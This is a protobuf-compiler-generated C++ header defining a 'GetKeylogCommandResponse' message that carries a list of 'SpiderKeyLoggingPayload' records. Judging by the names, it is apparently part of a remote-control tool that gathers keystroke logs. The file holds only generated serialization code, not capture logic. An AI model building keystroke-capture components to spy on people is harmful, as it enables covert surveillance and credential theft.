// Generated by the protocol buffer compiler.  DO NOT EDIT!
// source: Proto/GetKeylogCommandResponse.proto

#ifndef PROTOBUF_Proto_2fGetKeylogCommandResponse_2eproto__INCLUDED
#define PROTOBUF_Proto_2fGetKeylogCommandResponse_2eproto__INCLUDED

#include <string>

#include <google/protobuf/stubs/common.h>

#if GOOGLE_PROTOBUF_VERSION < 3001000
#error This file was generated by a newer version of protoc which is
#error incompatible with your Protocol Buffer headers.  Please update
#error your headers.
#endif
#if 3001000 < GOOGLE_PROTOBUF_MIN_PROTOC_VERSION
#error This file was generated by an older version of protoc which is
#error incompatible with your Protocol Buffer headers.  Please
#error regenerate this file with a newer version of protoc.
#endif

#include <google/protobuf/arena.h>
#include <google/protobuf/arenastring.h>
#include <google/protobuf/generated_message_util.h>
#include <google/protobuf/metadata.h>
#include <google/protobuf/message.h>
#include <google/protobuf/repeated_field.h>
#include <google/protobuf/extension_set.h>
#include <google/protobuf/unknown_field_set.h>
#include "SpiderKeyloggingPayload.pb.h"
// @@protoc_insertion_point(includes)

// Internal implementation detail -- do not call these.
void protobuf_AddDesc_Proto_2fGetKeylogCommandResponse_2eproto();
void protobuf_InitDefaults_Proto_2fGetKeylogCommandResponse_2eproto();
void protobuf_AssignDesc_Proto_2fGetKeylogCommandResponse_2eproto();
void protobuf_ShutdownFile_Proto_2fGetKeylogCommandResponse_2eproto();

class GetKeylogCommandResponse;

// ===================================================================

class GetKeylogCommandResponse : public ::google::protobuf::Message /* @@protoc_insertion_point(class_definition:GetKeylogCommandResponse) */ {
 public:
  GetKeylogCommandResponse();
  virtual ~GetKeylogCommandResponse();

  GetKeylogCommandResponse(const GetKeylogCommandResponse& from);

  inline GetKeylogCommandResponse& operator=(const GetKeylogCommandResponse& from) {
    CopyFrom(from);
    return *this;
  }

  static const ::google::protobuf::Descriptor* descriptor();
  static const GetKeylogCommandResponse& default_instance();

  static const GetKeylogCommandResponse* internal_default_instance();

  void Swap(GetKeylogCommandResponse* other);

  // implements Message ----------------------------------------------

  inline GetKeylogCommandResponse* New() const { return New(NULL); }

  GetKeylogCommandResponse* New(::google::protobuf::Arena* arena) const;
  void CopyFrom(const ::google::protobuf::Message& from);
  void MergeFrom(const ::google::protobuf::Message& from);
  void CopyFrom(const GetKeylogCommandResponse& from);
  void MergeFrom(const GetKeylogCommandResponse& from);
  void Clear();
  bool IsInitialized() const;

  size_t ByteSizeLong() const;
  bool MergePartialFromCodedStream(
      ::google::protobuf::io::CodedInputStream* input);
  void SerializeWithCachedSizes(
      ::google::protobuf::io::CodedOutputStream* output) const;
  ::google::protobuf::uint8* InternalSerializeWithCachedSizesToArray(
      bool deterministic, ::google::protobuf::uint8* output) const;
  ::google::protobuf::uint8* SerializeWithCachedSizesToArray(::google::protobuf::uint8* output) const {
    return InternalSerializeWithCachedSizesToArray(false, output);
  }
  int GetCachedSize() const { return _cached_size_; }
  private:
  void SharedCtor();
  void SharedDtor();
  void SetCachedSize(int size) const;
  void InternalSwap(GetKeylogCommandResponse* other);
  void UnsafeMergeFrom(const GetKeylogCommandResponse& from);
  private:
  inline ::google::protobuf::Arena* GetArenaNoVirtual() const {
    return _internal_metadata_.arena();
  }
  inline void* MaybeArenaPtr() const {
    return _internal_metadata_.raw_arena_ptr();
  }
  public:

  ::google::protobuf::Metadata GetMetadata() const;

  // nested types ----------------------------------------------------

  // accessors -------------------------------------------------------

  // repeated .SpiderKeyLoggingPayload keylog = 1;
  int keylog_size() const;
  void clear_keylog();
  static const int kKeylogFieldNumber = 1;
  const ::SpiderKeyLoggingPayload& keylog(int index) const;
  ::SpiderKeyLoggingPayload* mutable_keylog(int index);
  ::SpiderKeyLoggingPayload* add_keylog();
  ::google::protobuf::RepeatedPtrField< ::SpiderKeyLoggingPayload >*
      mutable_keylog();
  const ::google::protobuf::RepeatedPtrField< ::SpiderKeyLoggingPayload >&
      keylog() const;

  // @@protoc_insertion_point(class_scope:GetKeylogCommandResponse)
 private:

  ::google::protobuf::internal::InternalMetadataWithArena _internal_metadata_;
  ::google::protobuf::RepeatedPtrField< ::SpiderKeyLoggingPayload > keylog_;
  mutable int _cached_size_;
  friend void  protobuf_InitDefaults_Proto_2fGetKeylogCommandResponse_2eproto_impl();
  friend void  protobuf_AddDesc_Proto_2fGetKeylogCommandResponse_2eproto_impl();
  friend void protobuf_AssignDesc_Proto_2fGetKeylogCommandResponse_2eproto();
  friend void protobuf_ShutdownFile_Proto_2fGetKeylogCommandResponse_2eproto();

  void InitAsDefaultInstance();
};
extern ::google::protobuf::internal::ExplicitlyConstructed<GetKeylogCommandResponse> GetKeylogCommandResponse_default_instance_;

// ===================================================================


// ===================================================================

#if !PROTOBUF_INLINE_NOT_IN_HEADERS
// GetKeylogCommandResponse

// repeated .SpiderKeyLoggingPayload keylog = 1;
inline int GetKeylogCommandResponse::keylog_size() const {
  return keylog_.size();
}
inline void GetKeylogCommandResponse::clear_keylog() {
  keylog_.Clear();
}
inline const ::SpiderKeyLoggingPayload& GetKeylogCommandResponse::keylog(int index) const {
  // @@protoc_insertion_point(field_get:GetKeylogCommandResponse.keylog)
  return keylog_.Get(index);
}
inline ::SpiderKeyLoggingPayload* GetKeylogCommandResponse::mutable_keylog(int index) {
  // @@protoc_insertion_point(field_mutable:GetKeylogCommandResponse.keylog)
  return keylog_.Mutable(index);
}
inline ::SpiderKeyLoggingPayload* GetKeylogCommandResponse::add_keylog() {
  // @@protoc_insertion_point(field_add:GetKeylogCommandResponse.keylog)
  return keylog_.Add();
}
inline ::google::protobuf::RepeatedPtrField< ::SpiderKeyLoggingPayload >*
GetKeylogCommandResponse::mutable_keylog() {
  // @@protoc_insertion_point(field_mutable_list:GetKeylogCommandResponse.keylog)
  return &keylog_;
}
inline const ::google::protobuf::RepeatedPtrField< ::SpiderKeyLoggingPayload >&
GetKeylogCommandResponse::keylog() const {
  // @@protoc_insertion_point(field_list:GetKeylogCommandResponse.keylog)
  return keylog_;
}

inline const GetKeylogCommandResponse* GetKeylogCommandResponse::internal_default_instance() {
  return &GetKeylogCommandResponse_default_instance_.get();
}
#endif  // !PROTOBUF_INLINE_NOT_IN_HEADERS

// @@protoc_insertion_point(namespace_scope)

// @@protoc_insertion_point(global_scope)

#endif  // PROTOBUF_Proto_2fGetKeylogCommandResponse_2eproto__INCLUDED
